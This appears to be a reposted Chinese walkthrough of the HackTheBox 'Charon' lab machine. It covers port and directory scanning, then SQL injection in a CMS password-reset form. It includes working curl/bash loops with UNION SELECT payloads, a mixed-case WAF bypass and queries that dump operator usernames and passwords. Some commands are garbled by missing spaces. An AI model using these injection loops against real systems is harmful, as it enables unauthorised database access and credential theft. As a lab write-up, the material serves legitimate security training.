HTB:Charon渗透测试(一)

简介: HTB:Charon渗透测试

HackTheBox-Linux-Charon-Walkthrough

**

靶机地址:https://www.hackthebox.eu/home/machines/profile/42

靶机难度:中级(3.5/10)

靶机发布日期:2017年10月7日

靶机描述:

Charon is definitely one of the more challenging machines on HackTheBox. It does not require any advanced techniques, however there are many subtle tricks needed at almost every step of exploitation.

请注意:对于所有这些计算机,我是通过平台授权允许情况进行渗透的。我将使用Kali Linux作为解决该HTB的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

一、信息收集:

1.端口扫描

nmap发现开放了OpenSSH和Apache服务。

4dadf8ef342c324c579a206c3da5123a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

访问80端口,发现是一个cms界面。

ad76257912de425a9c9213ea5b62c3cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

翻了一下,没有可用的地方。

ccf6b4b09682f9b784f5cc986d072646_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.目录扫描

使用gobuster进行目录扫描

gobuster 
dir-u http://10.10.10.31 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php -o scans/gobuster-root-small-php -t 40

扫描发现存在cmsdata目录。

86b9a438ee08b21a9643f9ce3d30531d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

访问一下,发现是一个登录框,测试几个弱口令没成功。


996babce8d97f689aacd8789c3064c52_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

e6a0d9cf3c76793c2a7de479f7ceba1a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现有一个忘记密码功能。butp抓包测试sql注入。

53733c0c96ba2d7cd92dbf7c63156a9e_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

二、漏洞利用

3.sql注入

输入'报错,然后输入"提提升找不到这个emali。证明存在sql注入。

ef5f4bc1e1bced74b02416cafc8e0781_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

d910e8f0fdb481faae6dc091ddd55051_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用limit进行判断字段。

74c4cff6c9148f11bb50ca49322b79da_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

1.脚本测试

使用脚本枚举出了可用的用户名。

for i in{1..1000};do curl -s http://10.10.10.31/cmsdata/forgot.php --data-urlencode"email=a@b.c' or 1=1 limit ${i},1;-- -" | grep'<h2>' | awk'{print $5}' | grep-v"^with"||break;done

for i in $(seq 0 300); do
        payload="email=a@b.com' UNIoN SELECT 1,2,3,CONCAT(__username_, ':', __password_, '@b.com') FROM supercms.operators LIMIT 1 OFFSET $i-- -"
        curl -s -d "$payload" http://10.10.10.31/cmsdata/forgot.php | grep -o '[^ ]*@b.com'
        done

22ef15d30cd554aec0ca484316fa72cc_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.手工union联合查询Bypass waf

经过测试,发现在查到第4位的时候会出现报错。

59c41b61448f894934a348c1a5e31035_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

猜测可能存在waf拦截,然后经过测试,将UNION  SELECT都使用大写进行

测试,可以成功测试注入。

f8278b6723b43c662d8ae5c523bcf844_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

0c3ccd63628c4535d5f9e7a617dbf651_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用脚本探测那一列是电子邮箱的地址。

for i in $(seq 0 300); dopayload="email=a@b.com' UNIoN SELECT 1,2,3,CONCAT(__username_, ':', __password_, '@b.com') FROM supercms.operators LIMIT 1 OFFSET $i-- -"curl -s -d "$payload" http://10.10.10.31/cmsdata/forgot.php | grep -o '[^ ]*@b.com' done

f8c3aa467f7b1175b0ad1469ff5127c2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

52d0ccbce0110c6ab61c5149ed1514d2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现到了第四列的时候,出现了有关邮箱的格式。

0245f2a0a1c1448600ef18d35a164186_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用脚本枚举数据库。

for i in {0..100}; do curl -s http://10.10.10.31/cmsdata/forgot.php --data-urlencode "email=a@b.c' UNiON SELECT 1,schema_name,3,'a@b.c' from information_schema.schemata limit ${i},1;-- -" | grep '<h2>' | awk '{print $5}' | grep -v "^with$" || break; done | cut -d'>' -f2

cd7587f541e235cb717de0f007e790ae_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用GROUP_CONCATSQL 函数,它将一整列合并为一个结果。

1c089fff50681767ef5c30478482bb36_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

9b94b3ebfcf1191a35e68667fb5859da_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

ad476c7b74d99f3038ebc90500cb1125_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

联合查询获取用户名和密码。

118ed21754d5a854539eae753687ac9f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

查找管理员用户名和密码。

f0dce2d016c172bdecff08ea41652c9a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


相关文章
|
网络协议 Linux 网络安全
记一次对HTB:Timelapse的渗透测试
记一次对HTB:Timelapse的渗透测试
208 0
记一次对HTB:Timelapse的渗透测试
|
SQL 安全 前端开发
HTB:Charon渗透测试(二)
HTB:Charon渗透测试
146 0
HTB:Charon渗透测试(二)
|
安全 Shell 网络安全
HTB:Obscurity渗透测试(二)
HTB:Obscurity渗透测试
111 0
HTB:Obscurity渗透测试(二)
|
网络安全 Python
HTB:Obscurity渗透测试(一)
HTB:Obscurity渗透测试
129 0
HTB:Obscurity渗透测试(一)
|
1月前
|
安全 网络安全
Kali渗透测试:使用Armitage扫描网络
Kali渗透测试:使用Armitage扫描网络
|
1月前
|
安全 Linux 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(一)
|
1月前
|
Python Windows 网络安全
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
Kali 渗透测试:基于结构化异常处理的渗透-使用Python编写渗透模块(二)
|
1月前
|
Java 网络安全 Windows
Kali渗透测试:使用 Armitage生成被控端和主控端
Kali渗透测试:使用 Armitage生成被控端和主控端
|
18天前
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现
|
1月前
|
存储 安全 小程序
Kali渗透测试:使用Word宏病毒进行渗透攻击
Kali渗透测试:使用Word宏病毒进行渗透攻击
Kali渗透测试:使用Word宏病毒进行渗透攻击